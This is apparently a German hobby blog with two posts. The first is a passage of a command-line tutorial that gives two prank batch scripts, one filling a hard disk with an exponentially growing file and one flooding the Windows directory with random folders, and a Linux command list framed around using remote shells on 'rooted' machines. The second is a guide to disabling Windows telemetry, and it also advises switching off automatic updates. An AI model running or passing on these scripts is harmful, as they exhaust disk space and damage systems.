cmd /k title :: mygov’s haXX0r Konsole & color 0a & cd & cls & echo +++++++++++++++++++++++++ & echo + Welcome to HaXX-Shell + & echo +++++++++++++++++++++++++ & ver

Fertig =D Noch ein schönes Icon und wir hacken gleich viel besser als zuvor =D
cmd /k startet die Konsole und lässt die offen. Der Befehl title legt den Titel des Fensters fest, color 0a sorgt für die Matrix-Farbe, cls löscht den Konsolen-Inhalt, echo gibt eine kewle Begrüßung aus und ver zeigt uns unsere Windows-Version an. Die einzelnen Befehle sind durch & verkettet.

Blödsinn in Batch…

Schrieben wir uns mal ein kleines Batch-Script, dass die Festplatte mit Datenmüll floodet =D Notepad öffnen und folgenden Code abschreiben (kein Copy & Paste). Dann als .bat oder .cmd speichern (nicht als .txt).

@echo off
echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX > big
:loop
type big >> big
goto loop

@echo off sorgt dafür, dass die Befehle nicht immer auf dem Bildschirm ausgegeben werden. Dann erstellen wir uns eine Datei mit lauter XXXXX drinne. Setzt setzen wir eine Sprungmarke und lassen und mit type die XXXXX-Datei ausgeben. Aber nicht auf den Bildschirm, sondern fügen den Inhalt noch mal an die Datei big dran. Dann springen wir wieder zur Sprungmarke und das Spiel geht von vorne los =D Die big-Datei wächst also exponentiell (1-2-4-8-16-32-64-128-256-512-1024-usw.) und nach kurzer Zeit ist die Festplatte mit einer Datei voll =D

Ein Ordner-Flooder ist auch ganz lustig =)

@echo off
cd C:WINNT
:loop
mkdir %random%%random%%random%
goto loop

Wir wechseln erst in das Windows-Verzeichnis und erstellen dann Ordner mit einer (in unserem Fall drei) Zufallszahl (probiert mal echo %random%) also Ordnernamen. Dann wird geloopt. Schon sind in Sekunden tausende von Ordnern erstellt.

CMD und Batch ist toll :>

Ihr seht, mit der Konsole kann man ziemlich viel machen. Ihr habt nur einen Bruchteil der vorhandenen Befehle kennengelernt (alleine der net-Befehl ist riesig und mächtig) und viele warten noch darauf von euch benutzt zu werden. Ein kleine Listet erhaltet ihr, wenn ihr in der Konsole einfach mal help eingebt.
Wenn man einigermaßen mit der Konsole umgehen kann, ist es auch keine Arbeit Batch zu lernen, was wirklich einfach ist und trotzdem sehr hilfreich sein kann.

Bash

Meisten bekommen wir beim r00ten von Rechnern ja eine Remote-Shell, auf der wir unser Unwesen treiben können. Doch da wir alle Windows-User mit Leib und Seele sind, haben wir keine Ahnung, welche Befehle uns zur Verfügung stehen. Na dann müssen wir wohl ein paar Befehle kennenlernen. Und damit wir unsere 1337-Karriere voranzutreiben müssen wir lernen Exploits zu benutzen. Doch die sind fast alle für Linux geschrieben… Wir ihr seht kommt der Ueberhacker von Heute kaum um Linux rum. Also lasst uns mal einen kleinen Blick auf die wichtigsten Befehle werfe:

pwd – Gibt das aktuelle Arbeitsverzeichnis aus
cd – Wechselt in ein Verzeichnis
cd .. – Geht ein Verzeichnis nach oben im Verzeichnisbaum
ls – Gibt uns den Ordnerinhalt aus
cd – Wechselt ins Home-Verzeichnis
ls –a – Gibt uns den Ordnerinhalt mit erweiterten Informationen aus
mkdir – Erstellt einen Ordner
mv – Verschiebt von Quelle nach Ziel
rm – Löscht Dateien
cp – Kopiert Datei(en)
chmod – Rechteverteilung für Dateien/Ordner. Am besten die Hilfe angucken
cat – Gibt den Inhalt einer Datei aus
grep “” – Durchsucht eine Datei nach einem String
find – Sucht ausgehen vom Pfad nach Dateien
ln –s – Erstellt einen Softlink
echo – Gibt einen String aus
touch – Erstellt eine leere Datei
ps –a – Zeigt alle laufenden Prozesse an
kill – Einen Prozess beenden
clear – Bildschirminhalt löschen
telnet – Verbindet sich zu einem Rechner auf einem bestimmten Port
joe – Lädt eine Datei in Joe (Texteditor; falls installiert>
mc – Startet den Midnight-Commander (falls instelliert)
gcc exp.c –o exp – Compiliert den Code exp.c und erstellt die Datei exp
./exp – führt die Datei exp aus

Das waren jetzt einige ganz einfache Grundlagen. Aber ich muss das Rad nicht neu erfinden… Es gibt genug Webseiten und Bücher, die sich ausführlich mit diese, Thema beschäftigen. Also bei Bedarf einfach ein bissel googeln und ihr werdet sich was brauchbares finden!
Die Umleitungsoperatoren funktionieren genau so wie bei Windows, also muss ich darauf nicht näher eingehen (einfach bei CMD noch mal gucken). Und Bash-Scripte werde ich jetzt auch nicht mit euch schreiben =D

Geposted in Linux Stuff, Win Stuff

Windows – Home Phone

Jun04
2008 Kommentieren Geschrieben von Daniel

Autor: frek [kip@lavabit.com]
Version: 1.0

Windows – Phone Home
====================

1.0 Inhalt
1.1 Einleitung
2.0 RegDone – Onlinesystemüberprüfung
3.0 Der Internet Explorer
3.1 Alexia-Service
4.0 Die Akte Windows Media Player
5.0 Fehlerberichterstattung
6.0 Microsofts Internetzeit-Server
7.0 Windows Update
8.0 Schlusswort

1.1 Einleitung
—————

Phone Home !?! Was ist das nun schon wieder? Warum will Windows nach Hause telefonieren? Wahrscheinlich, um den Entwicklern zu sagen “kApuTT, krechhh crkkkrchhhhhhh …, tot!”.
Egal! Tatsache ist, dass Windows in seiner Standardkonfiguration kaum eine Möglichkeit auslässt Daten an Microsoft zu schicken. Ohne das es der Anwender etwas davon mitbekommt. Im folgenden kleine Paper will ich zeigen, wie man einige dieser ungewollten Telefonate unterbindet. Wer etwas zu ergänzen hat, soll dies einfach dazu schreiben, aber notieren, was von ihm geschrieben wurde.

2.0 RegDone – Onlinesystemüberprüfung
————————————-

Um die Onlineregistrierung, die am Anfang einer jeden Update-Funktion steht zu umgehen setzt man den Wert “RegDone” einfach manuell auf 1.

Schlüsell für Windows 98 & ME:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Welcome\RegWiz (@ auf 1 umstellen)

Schlüssel für Windows 2000 & XP:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Wenn noch kein Wert vorhanden ist, erstellen sie einfach einen Wert namens “RegDone”. Man sollte diese Registrierung umgehen, da persönliche Daten und eine eindeutige ID übermittelt wird.

3.0 Der Internet Explorer
————————-

Im Internet Explorer sollten folgende Einstellungen unter – Extras/Internetoptionen –> Erweitert – ausgeschaltet werden:

- Automatische Überprüfung auf Aktualisierung von Internet Explorer
- Integrierte Windows-Authentifizierung aktivieren

3.1 Alexia-Service
——————

Die heimliche Beziehung des Internet Explorers zu Alexa! Das heißt, wenn sie mit dem IE auf Datensuche im Internet sind, werden zeitgleich folgende Daten an Alexa übermittelt:

- Ihre IP-Adresse
- Alle URLs
- Informationen über Betriebsystem und Browser
- Alexa-Cookie-Nummer
- Datum

Nachzulesen auf: http://www.alexa.com/company/privacy.html

Um den Spion rauzuschmeißen, muss folgender Schlüssel gelöscht werden:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Extensions\{c95fe080-8f5d-11d2-a20b-00aa003c157a}

4.0 Die Akte Windows Media Player
———————————

Ja, auch er telefoniert sehr gern nach Hause. ;)
Siehe auch: http://www..microsoft.com/windows/windowsmedia/de/software/V8/privacy.asp#_What_personal_identifiable
Um dies zu verhindern sind drei Einstellung im Menue Optionen des WMP zu machen:

- Optionen/Player – (bei jedem das Häkchen raus ;)

- Codecs automatisch downloaden
- Identifikation des Players durch Internetseiten zulassen
- Lizenzen automatisch erwerben

5.0 Fehlerberichterstattung
—————————

Um die Fehlerberichterstattung auszuschalten, ändern sie den Wert DoReport auf 0.
Sie finden ihn unter dem Schlüssel:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting

Als Alternative dazu können sie unter – Systemsteuerung/System –> Erweitert/Fehlerbericherstattung – ebenfalls die Fehlerberichterstattung deaktivieren. Eine Deaktivierung ist sinnvoll, da nicht nur der Fehlerbericht sondern auch noch die Product-ID, zur Identifikation ihrer Lizenz, mitgeschickt wird. ;)

6.0 Microsofts Internetzeit-Server
———————————-

Ich weiß es klingt irgendwie paranoid, aber wer weiß was bei dem Zeitabgleich den Microsoft durchführt noch für Daten übermittelt werden? Daher sollte der Zeitabgleich via – time.windows.com – unterbunden werden. Dazu müssen sie unter
- Start/Systemsteuerung/Datum und Uhrzeit – folgendes ausschalten:

- Automatisch mit einem Internetzeitserver synchronisieren

7.0 Windows Update
——————

So eine Update-Funktion ist schon eine feine Sache, allerdings muss dazu ein ActiveX-Applet auf dem PC installiert werden, welches eine Reihe von Informationen, wie die Version des Betriebssystem, welche Hardwarekonfigurationen vorgenommen wurden usw. an Microsoft übermittelt. Muss es auch, damit das Update reibungslos ablaufen kann. Allerdings weiß man hier leider auch nicht genau, welche Informationen noch so übermittelt werden. Daher sollten Updates weiterhin manuell vorgenommen werden. Auf jeden Fall bei Microsoft. Um die automatische Update-Funktion zu deaktivieren müssen sie unter:

- Systemsteuerung/Automatische Updates -

den die Funktion deaktivieren. Unter Windows XP ist sie unter:

- Systemsteuerung/System –> Automatische Updates -

zu finden. Sie können aber auch gleich den Dienst “Automatische Updates” deaktivieren. Eine Auflistung aller Dienste finden sie unter:

- Systemsteuerung/Verwaltung/Dienste -

Dort den Dienst einfach deaktivieren.

8.0 Schlusswort
—————

Wahrscheinlich wurden von mir einige Sachen vergessen bzw. sind neu hinzukommen. Ich werde das Dokumente aber, wenn mir Neueres bzw. Vergessenes zugetragen wird, aktualisieren. Ansonsten ist das editieren und hinzufügen ausdrücklich erwünscht. Die neuen Stellen sollten allerdings gekenzeichnet werden. Das gilt natürlich nicht für das Ausbessern von Rechtschreibfehlern und kleine Ergänzungen. :)

Geposted in Tipps&Tricks, Win Stuff

Kategorien